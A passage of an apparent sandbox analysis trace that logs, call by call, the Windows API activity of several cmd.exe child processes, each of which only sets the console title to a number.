_get_osfhandle (_FileHandle=1) returned 0x5c [0203.485] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 0 [0203.485] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.485] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0203.485] SetConsoleInputExeNameW () returned 0x1 [0203.485] GetConsoleOutputCP () returned 0x1b5 [0203.485] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0203.485] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0203.486] exit (_Code=0) Process: id = "21" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x677b5000" os_pid = "0x4d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "19" os_parent_pid = "0x5cc" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" title 2495304\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 159 os_tid = 0x7f8 [0203.116] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa10 | out: lpSystemTimeAsFileTime=0x16fa10*(dwLowDateTime=0x1d897320, dwHighDateTime=0x1d661be)) [0203.116] GetCurrentProcessId () returned 0x4d4 [0203.116] GetCurrentThreadId () returned 0x7f8 [0203.116] GetTickCount () returned 0x113e782 [0203.116] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa18 | out: lpPerformanceCount=0x16fa18*=13361156431) returned 1 [0203.119] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab50000 [0203.119] __set_app_type (_Type=0x1) [0203.120] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab77810) returned 0x0 [0203.120] __getmainargs (in: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610, _DoWildCard=0, _StartInfo=0x4ab7e0f4 | out: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610) returned 0 [0203.120] GetCurrentThreadId () returned 0x7f8 [0203.120] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7f8) returned 0x38 [0203.491] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0203.491] GetProcAddress (hModule=0x76f60000, lpProcName="SetThreadUILanguage") returned 0x76f76d40 [0203.491] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0203.491] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.491] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f9a8 | out: phkResult=0x16f9a8*=0x0) returned 0x2 [0203.491] VirtualQuery (in: lpAddress=0x16f990, lpBuffer=0x16f910, dwLength=0x30 | out: lpBuffer=0x16f910*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.491] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f910, dwLength=0x30 | out: lpBuffer=0x16f910*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.491] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f910, dwLength=0x30 | out: lpBuffer=0x16f910*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.491] VirtualQuery (in: lpAddress=0x74000, lpBuffer=0x16f910, dwLength=0x30 | out: lpBuffer=0x16f910*(BaseAddress=0x74000, AllocationBase=0x70000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0203.491] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f910, dwLength=0x30 | out: lpBuffer=0x16f910*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0203.491] GetConsoleOutputCP () returned 0x1b5 [0203.491] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0203.492] SetConsoleCtrlHandler (HandlerRoutine=0x4ab73184, Add=1) returned 1 [0203.492] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.492] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0203.492] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.492] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 0 [0203.492] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.492] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0203.493] GetEnvironmentStringsW () returned 0x228b10* [0203.493] GetProcessHeap () returned 0x210000 [0203.493] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xac4) returned 0x2295e0 [0203.493] FreeEnvironmentStringsW (penv=0x228b10) returned 1 [0203.493] GetProcessHeap () returned 0x210000 [0203.493] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x8) returned 0x228390 [0203.493] GetEnvironmentStringsW () returned 0x228b10* [0203.493] GetProcessHeap () returned 0x210000 [0203.493] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xac4) returned 0x22a0b0 [0203.493] FreeEnvironmentStringsW (penv=0x228b10) returned 1 [0203.493] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e868 | out: phkResult=0x16e868*=0x40) returned 0x0 [0203.493] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x0, lpData=0x16e880*=0x18, lpcbData=0x16e864*=0x1000) returned 0x2 [0203.493] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x4, lpData=0x16e880*=0x1, lpcbData=0x16e864*=0x4) returned 0x0 [0203.493] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x0, lpData=0x16e880*=0x1, lpcbData=0x16e864*=0x1000) returned 0x2 [0203.493] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x4, lpData=0x16e880*=0x0, lpcbData=0x16e864*=0x4) returned 0x0 [0203.493] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x4, lpData=0x16e880*=0x40, lpcbData=0x16e864*=0x4) returned 0x0 [0203.493] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x4, lpData=0x16e880*=0x40, lpcbData=0x16e864*=0x4) returned 0x0 [0203.493] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x0, lpData=0x16e880*=0x40, lpcbData=0x16e864*=0x1000) returned 0x2 [0203.493] RegCloseKey (hKey=0x40) returned 0x0 [0203.494] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e868 | out: phkResult=0x16e868*=0x40) returned 0x0 [0203.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x0, lpData=0x16e880*=0x40, lpcbData=0x16e864*=0x1000) returned 0x2 [0203.494] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x4, lpData=0x16e880*=0x1, lpcbData=0x16e864*=0x4) returned 0x0 [0203.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x0, lpData=0x16e880*=0x1, lpcbData=0x16e864*=0x1000) returned 0x2 [0203.494] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x4, lpData=0x16e880*=0x0, lpcbData=0x16e864*=0x4) returned 0x0 [0203.494] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x4, lpData=0x16e880*=0x9, lpcbData=0x16e864*=0x4) returned 0x0 [0203.494] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x4, lpData=0x16e880*=0x9, lpcbData=0x16e864*=0x4) returned 0x0 [0203.494] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e860, lpData=0x16e880, lpcbData=0x16e864*=0x1000 | out: lpType=0x16e860*=0x0, lpData=0x16e880*=0x9, lpcbData=0x16e864*=0x1000) returned 0x2 [0203.494] RegCloseKey (hKey=0x40) returned 0x0 [0203.494] time (in: timer=0x0 | out: timer=0x0) returned 0x5f1ae1a6 [0203.494] srand (_Seed=0x5f1ae1a6) [0203.494] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 2495304\"" [0203.494] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /S /D /c\" title 2495304\"" [0203.494] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.494] GetProcessHeap () returned 0x210000 [0203.494] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x218) returned 0x22ab80 [0203.494] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22ab90, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0203.495] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0203.495] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0203.495] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0203.495] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.495] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ab7f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0203.495] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0203.495] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0203.495] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0203.495] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0203.495] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0203.495] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0203.495] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0203.495] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0203.495] GetProcessHeap () returned 0x210000 [0203.495] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x38) returned 0x226570 [0203.495] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f670 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.495] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x16f670, lpFilePart=0x16f650 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x16f650*="system32") returned 0x13 [0203.495] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0203.495] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x16f380 | out: lpFindFileData=0x16f380*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xad0000ad, cFileName="Windows", cAlternateFileName="")) returned 0x228970 [0203.495] FindClose (in: hFindFile=0x228970 | out: hFindFile=0x228970) returned 1 [0203.495] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x16f380 | out: lpFindFileData=0x16f380*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xad0000ad, cFileName="System32", cAlternateFileName="")) returned 0x228970 [0203.496] FindClose (in: hFindFile=0x228970 | out: hFindFile=0x228970) returned 1 [0203.496] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0203.496] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0203.496] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0203.496] GetProcessHeap () returned 0x210000 [0203.496] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x2295e0 | out: hHeap=0x210000) returned 1 [0203.496] GetEnvironmentStringsW () returned 0x228b10* [0203.496] GetProcessHeap () returned 0x210000 [0203.496] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xac4) returned 0x2295e0 [0203.496] FreeEnvironmentStringsW (penv=0x228b10) returned 1 [0203.496] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ab8c0a0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0203.496] GetProcessHeap () returned 0x210000 [0203.496] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x226570 | out: hHeap=0x210000) returned 1 [0203.496] GetProcessHeap () returned 0x210000 [0203.496] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x4016) returned 0x22ada0 [0203.496] GetProcessHeap () returned 0x210000 [0203.496] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x34) returned 0x226570 [0203.497] GetProcessHeap () returned 0x210000 [0203.497] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x22ada0 | out: hHeap=0x210000) returned 1 [0203.497] GetConsoleOutputCP () returned 0x1b5 [0203.497] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0203.497] GetUserDefaultLCID () returned 0x409 [0203.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ab87b50, cchData=8 | out: lpLCData=":") returned 2 [0203.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f780, cchData=128 | out: lpLCData="0") returned 2 [0203.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f780, cchData=128 | out: lpLCData="0") returned 2 [0203.497] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f780, cchData=128 | out: lpLCData="1") returned 2 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ab9a740, cchData=8 | out: lpLCData="/") returned 2 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ab9a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ab9a460, cchData=32 | out: lpLCData="Tue") returned 4 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ab9a420, cchData=32 | out: lpLCData="Wed") returned 4 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ab9a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ab9a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ab9a360, cchData=32 | out: lpLCData="Sat") returned 4 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ab9a700, cchData=32 | out: lpLCData="Sun") returned 4 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ab87b40, cchData=8 | out: lpLCData=".") returned 2 [0203.498] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ab9a4e0, cchData=8 | out: lpLCData=",") returned 2 [0203.498] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0203.499] GetProcessHeap () returned 0x210000 [0203.499] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x20c) returned 0x228b80 [0203.499] GetConsoleTitleW (in: lpConsoleTitle=0x228b80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.499] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0203.499] GetProcAddress (hModule=0x76f60000, lpProcName="CopyFileExW") returned 0x76f723d0 [0203.499] GetProcAddress (hModule=0x76f60000, lpProcName="IsDebuggerPresent") returned 0x76f68290 [0203.499] GetProcAddress (hModule=0x76f60000, lpProcName="SetConsoleInputExeNameW") returned 0x76f717e0 [0203.499] GetProcessHeap () returned 0x210000 [0203.499] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x4012) returned 0x22ada0 [0203.499] GetProcessHeap () returned 0x210000 [0203.499] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x22ada0 | out: hHeap=0x210000) returned 1 [0203.500] _wcsicmp (_String1="title", _String2=")") returned 75 [0203.500] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0203.500] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0203.500] _wcsicmp (_String1="IF", _String2="title") returned -11 [0203.500] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0203.500] _wcsicmp (_String1="REM", _String2="title") returned -2 [0203.500] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0203.500] GetProcessHeap () returned 0x210000 [0203.500] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0xb0) returned 0x228da0 [0203.500] GetProcessHeap () returned 0x210000 [0203.500] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x1c) returned 0x224630 [0203.501] GetProcessHeap () returned 0x210000 [0203.501] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x22) returned 0x224660 [0203.501] GetConsoleTitleW (in: lpConsoleTitle=0x16f690, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0203.502] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0203.502] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0203.502] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0203.502] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0203.502] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0203.502] _wcsicmp (_String1="title", _String2="CD") returned 17 [0203.502] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0203.502] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0203.502] _wcsicmp (_String1="title", _String2="REN") returned 2 [0203.502] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0203.502] _wcsicmp (_String1="title", _String2="SET") returned 1 [0203.502] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0203.502] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0203.502] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0203.502] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0203.502] _wcsicmp (_String1="title", _String2="MD") returned 7 [0203.502] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0203.502] _wcsicmp (_String1="title", _String2="RD") returned 2 [0203.502] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0203.502] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0203.502] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0203.502] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0203.502] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0203.502] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0203.502] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0203.502] _wcsicmp (_String1="title", _String2="VER") returned -2 [0203.502] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0203.502] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0203.502] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0203.502] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0203.502] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0203.502] GetProcessHeap () returned 0x210000 [0203.502] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x34) returned 0x2265f0 [0203.503] GetProcessHeap () returned 0x210000 [0203.503] RtlReAllocateHeap (Heap=0x210000, Flags=0x0, Ptr=0x2265f0, Size=0x22) returned 0x224690 [0203.503] GetProcessHeap () returned 0x210000 [0203.503] RtlSizeHeap (HeapHandle=0x210000, Flags=0x0, MemoryPointer=0x224690) returned 0x22 [0203.503] GetProcessHeap () returned 0x210000 [0203.503] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x2e) returned 0x2265f0 [0203.503] NtOpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x8, OpenAsSelf=0, TokenHandle=0x16f1d0 | out: TokenHandle=0x16f1d0*=0x0) returned 0xc000007c [0203.503] NtOpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x8, TokenHandle=0x16f1d0 | out: TokenHandle=0x16f1d0*=0x4c) returned 0x0 [0203.503] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x12, TokenInformation=0x16f1e0, TokenInformationLength=0x4, ReturnLength=0x16f1e8 | out: TokenInformation=0x16f1e0, ReturnLength=0x16f1e8) returned 0x0 [0203.503] NtQueryInformationToken (in: TokenHandle=0x4c, TokenInformationClass=0x1a, TokenInformation=0x16f1e8, TokenInformationLength=0x4, ReturnLength=0x16f1e0 | out: TokenInformation=0x16f1e8, ReturnLength=0x16f1e0) returned 0x0 [0203.503] NtClose (Handle=0x4c) returned 0x0 [0203.503] FormatMessageW (in: dwFlags=0x1900, lpSource=0x0, dwMessageId=0x40002748, dwLanguageId=0x0, lpBuffer=0x16f1b0, nSize=0x0, Arguments=0x16f1b8 | out: lpBuffer="蹠\"") returned 0xf [0203.504] GetProcessHeap () returned 0x210000 [0203.504] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x8, Size=0x218) returned 0x228e90 [0203.504] SetConsoleTitleW (lpConsoleTitle="Administrator: 2495304") returned 1 [0203.504] GetProcessHeap () returned 0x210000 [0203.504] HeapFree (in: hHeap=0x210000, dwFlags=0x0, lpMem=0x228e90 | out: hHeap=0x210000) returned 1 [0203.504] LocalFree (hMem=0x228e60) returned 0x0 [0203.504] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.504] SetConsoleMode (hConsoleHandle=0x5c, dwMode=0x0) returned 0 [0203.505] _get_osfhandle (_FileHandle=1) returned 0x5c [0203.505] GetConsoleMode (in: hConsoleHandle=0x5c, lpMode=0x4ab7e194 | out: lpMode=0x4ab7e194) returned 0 [0203.505] _get_osfhandle (_FileHandle=0) returned 0x3 [0203.505] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4ab7e198 | out: lpMode=0x4ab7e198) returned 1 [0203.505] SetConsoleInputExeNameW () returned 0x1 [0203.505] GetConsoleOutputCP () returned 0x1b5 [0203.505] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab8bfe0 | out: lpCPInfo=0x4ab8bfe0) returned 1 [0203.505] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0203.506] exit (_Code=0) Process: id = "22" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x39f44000" os_pid = "0x7f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x5d8" cmd_line = "C:\\Windows\\system32\\cmd.exe /S /D /c\" title 6532368\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e39d" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 161 os_tid = 0x3d8 [0203.456] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22ff10 | out: lpSystemTimeAsFileTime=0x22ff10*(dwLowDateTime=0x1d92f8a0, dwHighDateTime=0x1d661be)) [0203.456] GetCurrentProcessId () returned 0x7f4 [0203.456] GetCurrentThreadId () returned 0x3d8 [0203.456] GetTickCount () returned 0x113e7c0 [0203.457] QueryPerformanceCounter (in: lpPerformanceCount=0x22ff18 | out: lpPerformanceCount=0x22ff18*=13395233299) returned 1 [0203.460] GetModuleHandleW (lpModuleName=0x0) returned 0x4ab50000 [0203.460] __set_app_type (_Type=0x1) [0203.460] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4ab77810) returned 0x0 [0203.460] __getmainargs (in: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610, _DoWildCard=0, _StartInfo=0x4ab7e0f4 | out: _Argc=0x4ab9a608, _Argv=0x4ab9a618, _Env=0x4ab9a610) returned 0 [0203.460] GetCurrentThreadId () returned 0x3d8 [0203.461] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x3d8) returned 0x38 [0203.461] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f60000 [0203.461] GetProcAddress (hModule=0x76f60000, lpProcName="SetThreadUILanguage") returned 0x76f76d40 [0203.461] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0203.522] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0203.522] RegOpenKeyExW 